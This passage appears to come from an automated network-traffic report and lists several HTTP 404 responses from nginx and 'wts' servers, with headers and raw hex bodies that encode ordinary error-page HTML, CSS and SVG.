30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 08:45:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 08:45:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 08:45:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 08:45:42 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: wts/1.7.0Date: Tue, 03 Sep 2024 08:46:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: privateContent-Encoding: gzipStrict-Transport-Security: max-age=31536000Data Raw: 38 36 63 0d 0a 1f 8b 08 00 00 00 00 00 04 0a b5 58 7b 6f db d6 15 ff 7b fe 14 b7 0a 1c 6c 80 28 52 92 e3 87 24 6b 48 fd 40 02 24 5d 10 bb eb 06 04 08 28 f1 ca 24 42 91 2a 79 6d d9 31 0a 38 69 ea 47 12 37 06 da 3c 1c bb 48 b2 26 a9 97 21 56 ba b6 76 6c 37 cd 87 a9 48 c9 7f ed 2b ec 9c 7b 49 89 b6 6c 0f 2d 30 07 91 45 f2 9c df 39 e7 77 5e 97 ce 7d 30 fc 97 a1 f1 bf 5f 1a 21 3a 2b 9b e4 d2 c7 1f 5e 38 3f 44 62 92 2c 7f 92 1e 92 e5 e1 f1 61 f2 b7 73 e3 17 2f 90 64 42 21 63 cc 31 8a 4c 96 47 3e 8a 91 98 ce 58 25 23 cb d5 6a 35 51 4d 27 6c 67 42 1e bf 2c 4f 23 4a 12 d5 82 af 92 cb 75 12 1a d3 62 79 d2 95 e3 56 a6 cb a6 e5 0e 1e 81 90 1c 18 18 10 8a 42 98 aa 1a 2a 31 83 99 34 7f fe fc 18 49 2a e0 46 b3 f6 b2 b1 37 bf ff f5 6a b3 56 23 12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 71 57 b5 5c c9 a5 8e 51 ca 7e 46 ba 8a b6 46 db 70 45 db b4 9d cc 29 45 e9 ed 55 a2 e0 c9 44 32 44 af 52 63 42 67 99 82 6d 6a a8 9f 28 da 56 c9 98 b8 ea da 93 4e 91 12 0e 17 71 aa 1f d4 5a a0 0a fc a0 4e c5 89 98 6c 0b 27 13 3d 20 5d b5 1d 4d aa 3a 6a 25 53 70 a8 7a 4d c2 6b 54 9a 34 e3 b6 19 7a 9a 54 2a d3 44 01 66 e1 d7 99 ca b4 78 9e 28 19 8e cb 40 4a 7c 09 64 25 66 57 32 81 4c c9 a0 a6 e6 52 36 5b 51 35 cd b0 26 32 00 01 8f 04 0e 7e 13 d6 b9 e1 c0 bc 6a 9a 3c 4c 77 b2 0c a4 cf 48 10 2e 53 0d 8b 3a e4 30 98 54 b0 19 b3 cb dc 96 c8 0f 37 dd 23 dc 33 e9 04 b5 b4 84 65 4b 74 ba a2 5a 9a 04 c0 2d 37 52 e8 03 3a 02 c2 dc 99 6c 98 60 08 12 ca 24 09 02 e8 85 00 99 0d 08 4d f3 9f 6c 28 8b ba 0a e9 87 4f 21 7f 35 e2 04 f0 94 25 5d 9c ea 68 fe 22 dc 03 f3 60 40 cd 98 86 75 2d ae 66 a6 0c d7 60 54 0b 4d 29 4a df c8 e8 a8 28 af 28 00 57 d1 ed 29 ea cc 62 a5 4a 1a 2d da 8e ca 0c db ca 58 b6 45 11 52 4f ce b6 cd a4 78 8a c3 e0 c2 ca 18 05 68 94 4c 45 24 93 bc 9e 0f 4b 0e 0d 85 35 a4 a7 0f 08 63 e5 04 c2 41 6d 00 71 21 7e 44 ab e7 80 56 aa 43 0b 93 a0 00 55 9f 9d d2 a1 8f 21 ac aa a1 31 3d 33 d0 db 1d c2 63 42 10 3b 2c a1 5e d0 48 75 13 f1 2b cb 43 0d 1a 30 c6 1c 5a 98 2c ea 94 91 8b 63 b1 78 d8 8f 91 fe 23 5d d0 30 bc e3 90 82 82 5a bc 36 e1 e0 30 80 2a e3 77 cf 0c f5 f7 7d 98 e2 ee 60 dd 51 8b cd 86 8c 70 2f 52 dd d9 8a 0d 89 42 be 1d 6a 02 f1 53 9c f3 44 47 b5 c6 b1 4f 11 a0 5d c0 b3 6d 7b 99 53 68 ff 70 a8 bc 7c a1 9e 5a a1 22 b3 c7 18 ec 40 27 95 a8 ab 22 27 3c 10 8d 42 ff 98 ae 64 d2 12 0b d8 4d 9f e9 ce 96 4c 5b 65 19 bc 19 10 2d 39 7c ce 40 88 98 8d 50 8b df 0c d4 7a d3 07 d4 b0 0a 01 a5 9a d1 0d 4d a3 16 57 83 31 07 77 af c2 7f 17 38 8a 24 f3 aa 2e c6 58 12 22 2a 1b 96 14 b
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: wts/1.7.0Date: Tue, 03 Sep 2024 08:46:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: privateContent-Encoding: gzipStrict-Transport-Security: max-age=31536000Data Raw: 38 36 63 0d 0a 1f 8b 08 00 00 00 00 00 04 0a b5 58 7b 6f db d6 15 ff 7b fe 14 b7 0a 1c 6c 80 28 52 92 e3 87 24 6b 48 fd 40 02 24 5d 10 bb eb 06 04 08 28 f1 ca 24 42 91 2a 79 6d d9 31 0a 38 69 ea 47 12 37 06 da 3c 1c bb 48 b2 26 a9 97 21 56 ba b6 76 6c 37 cd 87 a9 48 c9 7f ed 2b ec 9c 7b 49 89 b6 6c 0f 2d 30 07 91 45 f2 9c df 39 e7 77 5e 97 ce 7d 30 fc 97 a1 f1 bf 5f 1a 21 3a 2b 9b e4 d2 c7 1f 5e 38 3f 44 62 92 2c 7f 92 1e 92 e5 e1 f1 61 f2 b7 73 e3 17 2f 90 64 42 21 63 cc 31 8a 4c 96 47 3e 8a 91 98 ce 58 25 23 cb d5 6a 35 51 4d 27 6c 67 42 1e bf 2c 4f 23 4a 12 d5 82 af 92 cb 75 12 1a d3 62 79 d2 95 e3 56 a6 cb a6 e5 0e 1e 81 90 1c 18 18 10 8a 42 98 aa 1a 2a 31 83 99 34 7f fe fc 18 49 2a e0 46 b3 f6 b2 b1 37 bf ff f5 6a b3 56 23 12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 71 57 b5 5c c9 a5 8e 51 ca 7e 46 ba 8a b6 46 db 70 45 db b4 9d cc 29 45 e9 ed 55 a2 e0 c9 44 32 44 af 52 63 42 67 99 82 6d 6a a8 9f 28 da 56 c9 98 b8 ea da 93 4e 91 12 0e 17 71 aa 1f d4 5a a0 0a fc a0 4e c5 89 98 6c 0b 27 13 3d 20 5d b5 1d 4d aa 3a 6a 25 53 70 a8 7a 4d c2 6b 54 9a 34 e3 b6 19 7a 9a 54 2a d3 44 01 66 e1 d7 99 ca b4 78 9e 28 19 8e cb 40 4a 7c 09 64 25 66 57 32 81 4c c9 a0 a6 e6 52 36 5b 51 35 cd b0 26 32 00 01 8f 04 0e 7e 13 d6 b9 e1 c0 bc 6a 9a 3c 4c 77 b2 0c a4 cf 48 10 2e 53 0d 8b 3a e4 30 98 54 b0 19 b3 cb dc 96 c8 0f 37 dd 23 dc 33 e9 04 b5 b4 84 65 4b 74 ba a2 5a 9a 04 c0 2d 37 52 e8 03 3a 02 c2 dc 99 6c 98 60 08 12 ca 24 09 02 e8 85 00 99 0d 08 4d f3 9f 6c 28 8b ba 0a e9 87 4f 21 7f 35 e2 04 f0 94 25 5d 9c ea 68 fe 22 dc 03 f3 60 40 cd 98 86 75 2d ae 66 a6 0c d7 60 54 0b 4d 29 4a df c8 e8 a8 28 